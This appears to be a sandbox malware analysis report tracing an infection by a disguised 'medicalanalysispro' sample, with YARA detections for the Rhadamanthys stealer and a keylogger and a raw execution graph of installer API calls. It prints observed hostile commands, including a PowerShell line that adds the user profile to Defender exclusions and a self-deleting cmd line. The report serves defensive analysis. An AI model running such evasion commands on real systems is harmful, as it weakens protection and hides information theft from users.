Commandline: "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
Imagebase: 0x740000
File size: 191'552 bytes
MD5 hash: 48C96771106DBDD5D42BBA3772E4B414
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 17:53:22
Start date: 22/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 17:53:22
Start date: 22/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:53:22
Start date: 22/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Imagebase: 0x880000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 17:53:24
Start date: 22/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff6ef0c0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 17:53:33
Start date: 22/12/2024
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
Imagebase: 0xf20000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 17:53:33
Start date: 22/12/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 17:53:34
Start date: 22/12/2024
Path: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe"
Imagebase: 0x7ff7600a0000
File size: 206'336 bytes
MD5 hash: 178A2A89CB76EFEA6DF50CC884991226
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID:13
Start time:17:53:34
Start date:22/12/2024
Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
Imagebase:0x140000
File size:93'696 bytes
MD5 hash:443B43ADCB78164D40C977ABAC54C18E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2858444058.0000000005940000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:15
Start time:17:54:24
Start date:22/12/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:0xd20000
File size:42'064 bytes
MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2844728394.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:16
Start time:17:54:25
Start date:22/12/2024
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0xae0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:19
Start time:17:54:25
Start date:22/12/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348
Imagebase:0x9a0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:17:54:27
Start date:22/12/2024
Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe
Imagebase:0xfb0000
File size:25'600 bytes
MD5 hash:2DBC39DCE4C3B66019E84A28A342EAD0
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:17:54:32
Start date:22/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe"
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:17:54:32
Start date:22/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:17:54:32
Start date:22/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout 1
Imagebase:0x3f0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:17:54:34
Start date:22/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:17:54:47
Start date:22/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b"
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:17:54:48
Start date:22/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:17:54:50
Start date:22/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:17:54:53
Start date:22/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:17:55:09
Start date:22/12/2024
Path:C:\Program Files\Windows Media Player\wmplayer.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
Imagebase:0x7ff7e0b30000
                                                                                                                                                                                                                                                                                                              File size:171'008 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Has exited:false


                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:16.6%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:20.3%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:1480
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:41
4828 40553c 4824->4828 4830 405908 4825->4830 4826->4812 4827->4823 4831 4055b3 4828->4831 4832 405548 GetDlgItem 4828->4832 4829->4814 4833 405680 SendMessageW 4829->4833 4830->4823 4839 405939 ShowWindow 4830->4839 4838 403df6 8 API calls 4831->4838 4836 405578 4832->4836 4837 40555b SendMessageW IsWindowEnabled 4832->4837 4833->4823 4834 40141d 80 API calls 4834->4846 4835 40590a DestroyWindow EndDialog 4835->4830 4841 405585 4836->4841 4844 4055cc SendMessageW 4836->4844 4845 405598 4836->4845 4851 40557d 4836->4851 4837->4823 4837->4836 4838->4823 4839->4823 4840 406831 18 API calls 4840->4846 4841->4844 4841->4851 4842 403d44 SendMessageW 4842->4831 4843 403d6b 19 API calls 4843->4846 4844->4831 4847 4055a0 4845->4847 4848 4055b5 4845->4848 4846->4823 4846->4834 4846->4835 4846->4840 4846->4843 4852 403d6b 19 API calls 4846->4852 4867 40584a DestroyWindow 4846->4867 4850 40141d 80 API calls 4847->4850 4849 40141d 80 API calls 4848->4849 4849->4851 4850->4851 4851->4831 4851->4842 4853 405731 GetDlgItem 4852->4853 4854 405746 4853->4854 4855 40574f ShowWindow EnableWindow 4853->4855 4854->4855 4876 403db1 EnableWindow 4855->4876 4857 405779 EnableWindow 4860 40578d 4857->4860 4858 405792 GetSystemMenu EnableMenuItem SendMessageW 4859 4057c2 SendMessageW 4858->4859 4858->4860 4859->4860 4860->4858 4877 403dc4 SendMessageW 4860->4877 4878 406035 lstrcpynW 4860->4878 4863 4057f0 lstrlenW 4864 406831 18 API calls 4863->4864 4865 405806 SetWindowTextW 4864->4865 4866 40139d 80 API calls 4865->4866 4866->4846 4867->4830 4868 405864 CreateDialogParamW 4867->4868 4868->4830 4869 405897 4868->4869 4870 403d6b 19 API calls 4869->4870 4871 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4870->4871 4872 40139d 80 API calls 4871->4872 4873 4058e8 4872->4873 4873->4823 4874 4058f0 ShowWindow 4873->4874 4875 403ddb SendMessageW 4874->4875 4875->4830 4876->4857 4877->4860 4878->4863 4879 402da5 4880 4030e3 4879->4880 4881 402dac 4879->4881 4882 401446 18 API calls 
4881->4882 4883 402db8 4882->4883 4884 402dbf SetFilePointer 4883->4884 4884->4880 4885 402dcf 4884->4885 4885->4880 4887 405f7d wsprintfW 4885->4887 4887->4880 4888 4049a8 GetDlgItem GetDlgItem 4889 4049fe 7 API calls 4888->4889 4894 404c16 4888->4894 4890 404aa2 DeleteObject 4889->4890 4891 404a96 SendMessageW 4889->4891 4892 404aad 4890->4892 4891->4890 4895 404ae4 4892->4895 4898 406831 18 API calls 4892->4898 4893 404cfb 4896 404da0 4893->4896 4897 404c09 4893->4897 4902 404d4a SendMessageW 4893->4902 4894->4893 4906 40487a 5 API calls 4894->4906 4919 404c86 4894->4919 4901 403d6b 19 API calls 4895->4901 4899 404db5 4896->4899 4900 404da9 SendMessageW 4896->4900 4903 403df6 8 API calls 4897->4903 4904 404ac6 SendMessageW SendMessageW 4898->4904 4911 404dc7 ImageList_Destroy 4899->4911 4912 404dce 4899->4912 4917 404dde 4899->4917 4900->4899 4907 404af8 4901->4907 4902->4897 4909 404d5f SendMessageW 4902->4909 4910 404f97 4903->4910 4904->4892 4905 404ced SendMessageW 4905->4893 4906->4919 4913 403d6b 19 API calls 4907->4913 4908 404f48 4908->4897 4918 404f5d ShowWindow GetDlgItem ShowWindow 4908->4918 4914 404d72 4909->4914 4911->4912 4915 404dd7 GlobalFree 4912->4915 4912->4917 4921 404b09 4913->4921 4923 404d83 SendMessageW 4914->4923 4915->4917 4916 404bd6 GetWindowLongW SetWindowLongW 4920 404bf0 4916->4920 4917->4908 4922 40141d 80 API calls 4917->4922 4932 404e10 4917->4932 4918->4897 4919->4893 4919->4905 4924 404bf6 ShowWindow 4920->4924 4925 404c0e 4920->4925 4921->4916 4927 404b65 SendMessageW 4921->4927 4928 404bd0 4921->4928 4930 404b93 SendMessageW 4921->4930 4931 404ba7 SendMessageW 4921->4931 4922->4932 4923->4896 4939 403dc4 SendMessageW 4924->4939 4940 403dc4 SendMessageW 4925->4940 4927->4921 4928->4916 4928->4920 4930->4921 4931->4921 4933 404e54 4932->4933 4936 404e3e SendMessageW 4932->4936 4934 404f1f InvalidateRect 4933->4934 4938 404ecd SendMessageW SendMessageW 4933->4938 4934->4908 4935 404f35 4934->4935 4937 4043d9 21 API calls 
4935->4937 4936->4933 4937->4908 4938->4933 4939->4897 4940->4894 4941 4030a9 SendMessageW 4942 4030c2 InvalidateRect 4941->4942 4943 4030e3 4941->4943 4942->4943 3760 4038af #17 SetErrorMode OleInitialize 3761 406328 3 API calls 3760->3761 3762 4038f2 SHGetFileInfoW 3761->3762 3834 406035 lstrcpynW 3762->3834 3764 40391d GetCommandLineW 3835 406035 lstrcpynW 3764->3835 3766 40392f GetModuleHandleW 3767 403947 3766->3767 3768 405d32 CharNextW 3767->3768 3769 403956 CharNextW 3768->3769 3780 403968 3769->3780 3770 403a02 3771 403a21 GetTempPathW 3770->3771 3836 4037f8 3771->3836 3773 403a37 3775 403a3b GetWindowsDirectoryW lstrcatW 3773->3775 3776 403a5f DeleteFileW 3773->3776 3774 405d32 CharNextW 3774->3780 3778 4037f8 11 API calls 3775->3778 3844 4035b3 GetTickCount GetModuleFileNameW 3776->3844 3781 403a57 3778->3781 3779 403a73 3782 403af8 3779->3782 3784 405d32 CharNextW 3779->3784 3820 403add 3779->3820 3780->3770 3780->3774 3787 403a04 3780->3787 3781->3776 3781->3782 3930 403885 3782->3930 3788 403a8a 3784->3788 3937 406035 lstrcpynW 3787->3937 3799 403b23 lstrcatW lstrcmpiW 3788->3799 3800 403ab5 3788->3800 3790 403bfa 3793 403c7d 3790->3793 3795 406328 3 API calls 3790->3795 3791 403b0d 3794 405ccc MessageBoxIndirectW 3791->3794 3792 406113 9 API calls 3792->3782 3796 403b1b ExitProcess 3794->3796 3798 403c09 3795->3798 3802 406328 3 API calls 3798->3802 3799->3782 3801 403b3f CreateDirectoryW SetCurrentDirectoryW 3799->3801 3803 4067aa 18 API calls 3800->3803 3804 403b62 3801->3804 3805 403b57 3801->3805 3806 403c12 3802->3806 3807 403ac3 3803->3807 3941 406035 lstrcpynW 3804->3941 3940 406035 lstrcpynW 3805->3940 3810 406328 3 API calls 3806->3810 3807->3782 3938 406035 lstrcpynW 3807->3938 3813 403c1b 3810->3813 3812 403b70 3942 406035 lstrcpynW 3812->3942 3814 403c69 ExitWindowsEx 3813->3814 3819 403c29 GetCurrentProcess 3813->3819 3814->3793 3818 403c76 3814->3818 3815 403ad2 3939 406035 lstrcpynW 3815->3939 3946 40141d 3818->3946 3823 403c39 
3819->3823 3872 405958 3820->3872 3822 406831 18 API calls 3824 403b98 DeleteFileW 3822->3824 3823->3814 3825 403ba5 CopyFileW 3824->3825 3831 403b7f 3824->3831 3825->3831 3826 403bee 3827 406c94 42 API calls 3826->3827 3829 403bf5 3827->3829 3828 406c94 42 API calls 3828->3831 3829->3782 3830 406831 18 API calls 3830->3831 3831->3822 3831->3826 3831->3828 3831->3830 3833 403bd9 CloseHandle 3831->3833 3943 405c6b CreateProcessW 3831->3943 3833->3831 3834->3764 3835->3766 3837 406064 5 API calls 3836->3837 3838 403804 3837->3838 3839 40380e 3838->3839 3840 40674e 3 API calls 3838->3840 3839->3773 3841 403816 CreateDirectoryW 3840->3841 3842 405eab 2 API calls 3841->3842 3843 40382a 3842->3843 3843->3773 3949 405e7c GetFileAttributesW CreateFileW 3844->3949 3846 4035f3 3866 403603 3846->3866 3950 406035 lstrcpynW 3846->3950 3848 403619 3849 40677d 2 API calls 3848->3849 3850 40361f 3849->3850 3951 406035 lstrcpynW 3850->3951 3852 40362a GetFileSize 3853 403726 3852->3853 3867 403641 3852->3867 3952 4032d2 3853->3952 3855 40372f 3857 40376b GlobalAlloc 3855->3857 3855->3866 3963 403368 SetFilePointer 3855->3963 3856 403336 ReadFile 3856->3867 3964 403368 SetFilePointer 3857->3964 3860 4037e9 3863 4032d2 6 API calls 3860->3863 3861 403786 3864 40337f 33 API calls 3861->3864 3862 40374c 3865 403336 ReadFile 3862->3865 3863->3866 3870 403792 3864->3870 3869 403757 3865->3869 3866->3779 3867->3853 3867->3856 3867->3860 3867->3866 3868 4032d2 6 API calls 3867->3868 3868->3867 3869->3857 3869->3866 3870->3866 3870->3870 3871 4037c0 SetFilePointer 3870->3871 3871->3866 3873 406328 3 API calls 3872->3873 3874 40596c 3873->3874 3875 405972 3874->3875 3876 405984 3874->3876 3978 405f7d wsprintfW 3875->3978 3877 405eff 3 API calls 3876->3877 3878 4059b5 3877->3878 3880 4059d4 lstrcatW 3878->3880 3882 405eff 3 API calls 3878->3882 3881 405982 3880->3881 3969 403ec1 3881->3969 3882->3880 3885 4067aa 18 API calls 3886 405a06 3885->3886 3887 405a9c 3886->3887 3889 405eff 3 API calls 
3886->3889 3888 4067aa 18 API calls 3887->3888 3890 405aa2 3888->3890 3891 405a38 3889->3891 3892 405ab2 3890->3892 3893 406831 18 API calls 3890->3893 3891->3887 3895 405a5b lstrlenW 3891->3895 3898 405d32 CharNextW 3891->3898 3894 405ad2 LoadImageW 3892->3894 3980 403ea0 3892->3980 3893->3892 3896 405b92 3894->3896 3897 405afd RegisterClassW 3894->3897 3899 405a69 lstrcmpiW 3895->3899 3900 405a8f 3895->3900 3904 40141d 80 API calls 3896->3904 3902 403aed 3897->3902 3903 405b45 SystemParametersInfoW CreateWindowExW 3897->3903 3905 405a56 3898->3905 3899->3900 3906 405a79 GetFileAttributesW 3899->3906 3908 40674e 3 API calls 3900->3908 3902->3792 3903->3896 3909 405b98 3904->3909 3905->3895 3910 405a85 3906->3910 3907 405ac8 3907->3894 3911 405a95 3908->3911 3909->3902 3912 403ec1 19 API calls 3909->3912 3910->3900 3913 40677d 2 API calls 3910->3913 3979 406035 lstrcpynW 3911->3979 3915 405ba9 3912->3915 3913->3900 3916 405bb5 ShowWindow LoadLibraryW 3915->3916 3917 405c38 3915->3917 3918 405bd4 LoadLibraryW 3916->3918 3919 405bdb GetClassInfoW 3916->3919 3985 405073 OleInitialize 3917->3985 3918->3919 3921 405c05 DialogBoxParamW 3919->3921 3922 405bef GetClassInfoW RegisterClassW 3919->3922 3926 40141d 80 API calls 3921->3926 3922->3921 3923 405c3e 3924 405c42 3923->3924 3925 405c5a 3923->3925 3924->3902 3929 40141d 80 API calls 3924->3929 3927 40141d 80 API calls 3925->3927 3928 405c2d 3926->3928 3927->3902 3928->3902 3929->3902 3931 40389d 3930->3931 3932 40388f CloseHandle 3930->3932 4114 403caf 3931->4114 3932->3931 3935 406cc7 81 API calls 3936 4038ae CoUninitialize 3935->3936 3936->3790 3936->3791 3937->3771 3938->3815 3939->3820 3940->3804 3941->3812 3942->3831 3944 405ca6 3943->3944 3945 405c9a CloseHandle 3943->3945 3944->3831 3945->3944 3947 40139d 80 API calls 3946->3947 3948 401432 3947->3948 3948->3793 3949->3846 3950->3848 3951->3852 3953 4032f3 3952->3953 3954 4032db 3952->3954 3957 403303 GetTickCount 3953->3957 3958 4032fb 3953->3958 3955 4032e4 
DestroyWindow 3954->3955 3956 4032eb 3954->3956 3955->3956 3956->3855 3960 403311 CreateDialogParamW ShowWindow 3957->3960 3961 403334 3957->3961 3965 40635e 3958->3965 3960->3961 3961->3855 3963->3862 3964->3861 3966 40637b PeekMessageW 3965->3966 3967 406371 DispatchMessageW 3966->3967 3968 403301 3966->3968 3967->3966 3968->3855 3970 403ed5 3969->3970 3993 405f7d wsprintfW 3970->3993 3972 403f49 3973 406831 18 API calls 3972->3973 3974 403f55 SetWindowTextW 3973->3974 3975 403f70 3974->3975 3976 403f8b 3975->3976 3977 406831 18 API calls 3975->3977 3976->3885 3977->3975 3978->3881 3979->3887 3994 406035 lstrcpynW 3980->3994 3982 403eb4 3983 40674e 3 API calls 3982->3983 3984 403eba lstrcatW 3983->3984 3984->3907 3995 403ddb 3985->3995 3987 403ddb SendMessageW 3988 4050d1 OleUninitialize 3987->3988 3988->3923 3989 4062cf 11 API calls 3990 405096 3989->3990 3990->3989 3992 4050c1 3990->3992 3998 40139d 3990->3998 3992->3987 3993->3972 3994->3982 3996 403df3 3995->3996 3997 403de4 SendMessageW 3995->3997 3996->3990 3997->3996 4001 4013a4 3998->4001 3999 401410 3999->3990 4001->3999 4002 4013dd MulDiv SendMessageW 4001->4002 4003 4015a0 4001->4003 4002->4001 4004 4015fa 4003->4004 4084 40160c 4003->4084 4005 401601 4004->4005 4006 401742 4004->4006 4007 401962 4004->4007 4008 4019ca 4004->4008 4009 40176e 4004->4009 4010 401650 4004->4010 4011 4017b1 4004->4011 4012 401672 4004->4012 4013 401693 4004->4013 4014 401616 4004->4014 4015 4016d6 4004->4015 4016 401736 4004->4016 4017 401897 4004->4017 4018 4018db 4004->4018 4019 40163c 4004->4019 4020 4016bd 4004->4020 4004->4084 4029 4062cf 11 API calls 4005->4029 4021 401751 ShowWindow 4006->4021 4022 401758 4006->4022 4026 40145c 18 API calls 4007->4026 4033 40145c 18 API calls 4008->4033 4023 40145c 18 API calls 4009->4023 4047 4062cf 11 API calls 4010->4047 4027 40145c 18 API calls 4011->4027 4024 40145c 18 API calls 4012->4024 4028 401446 18 API calls 4013->4028 4032 40145c 18 API calls 4014->4032 4046 401446 18 
API calls 4015->4046 4015->4084 4016->4084 4113 405f7d wsprintfW 4016->4113 4025 40145c 18 API calls 4017->4025 4030 40145c 18 API calls 4018->4030 4034 401647 PostQuitMessage 4019->4034 4019->4084 4031 4062cf 11 API calls 4020->4031 4021->4022 4035 401765 ShowWindow 4022->4035 4022->4084 4036 401775 4023->4036 4037 401678 4024->4037 4038 40189d 4025->4038 4039 401968 GetFullPathNameW 4026->4039 4040 4017b8 4027->4040 4041 40169a 4028->4041 4029->4084 4042 4018e2 4030->4042 4043 4016c7 SetForegroundWindow 4031->4043 4044 40161c 4032->4044 4045 4019d1 SearchPathW 4033->4045 4034->4084 4035->4084 4049 4062cf 11 API calls 4036->4049 4050 4062cf 11 API calls 4037->4050 4051 406301 2 API calls 4038->4051 4052 4019a1 4039->4052 4053 40197f 4039->4053 4054 4062cf 11 API calls 4040->4054 4055 4062cf 11 API calls 4041->4055 4056 40145c 18 API calls 4042->4056 4043->4084 4057 4062cf 11 API calls 4044->4057 4045->4016 4045->4084 4046->4084 4058 401664 4047->4058 4059 401785 SetFileAttributesW 4049->4059 4060 401683 4050->4060 4061 4018a5 4051->4061 4073 4019b8 GetShortPathNameW 4052->4073 4052->4084 4053->4052 4079 406301 2 API calls 4053->4079 4062 4017c9 4054->4062 4063 4016a7 4055->4063 4064 4018eb 4056->4064 4065 401627 4057->4065 4066 40139d 65 API calls 4058->4066 4067 40179a 4059->4067 4059->4084 4077 404f9e 25 API calls 4060->4077 4068 4018c2 4061->4068 4069 4018a9 4061->4069 4070 405d85 4 API calls 4062->4070 4071 4016b1 Sleep 4063->4071 4072 4016ae 4063->4072 4074 40145c 18 API calls 4064->4074 4075 404f9e 25 API calls 4065->4075 4066->4084 4076 4062cf 11 API calls 4067->4076 4080 4062cf 11 API calls 4068->4080 4078 4062cf 11 API calls 4069->4078 4081 4017d4 4070->4081 4071->4084 4072->4071 4073->4084 4082 4018f5 4074->4082 4075->4084 4076->4084 4077->4084 4078->4084 4083 401991 4079->4083 4080->4084 4085 401864 4081->4085 4088 405d32 CharNextW 4081->4088 4106 4062cf 11 API calls 4081->4106 4086 4062cf 11 API calls 4082->4086 4083->4052 4112 406035 lstrcpynW 
4083->4112 4084->4001 4085->4060 4087 40186e 4085->4087 4089 401902 MoveFileW 4086->4089 4090 404f9e 25 API calls 4087->4090 4092 4017e6 CreateDirectoryW 4088->4092 4093 401912 4089->4093 4094 40191e 4089->4094 4095 401875 4090->4095 4092->4081 4096 4017fe GetLastError 4092->4096 4093->4060 4100 406301 2 API calls 4094->4100 4110 401942 4094->4110 4111 406035 lstrcpynW 4095->4111 4098 401827 GetFileAttributesW 4096->4098 4099 40180b GetLastError 4096->4099 4098->4081 4103 4062cf 11 API calls 4099->4103 4104 401929 4100->4104 4101 401882 SetCurrentDirectoryW 4101->4084 4102 4062cf 11 API calls 4105 40195c 4102->4105 4103->4081 4107 406c94 42 API calls 4104->4107 4104->4110 4105->4084 4106->4081 4108 401936 4107->4108 4109 404f9e 25 API calls 4108->4109 4109->4110 4110->4102 4111->4101 4112->4052 4113->4084 4115 403cbd 4114->4115 4116 4038a2 4115->4116 4117 403cc2 FreeLibrary GlobalFree 4115->4117 4116->3935 4117->4116 4117->4117 3503 401cb2 3504 40145c 18 API calls 3503->3504 3505 401c54 3504->3505 3506 4062cf 11 API calls 3505->3506 3509 401c64 3505->3509 3507 401c59 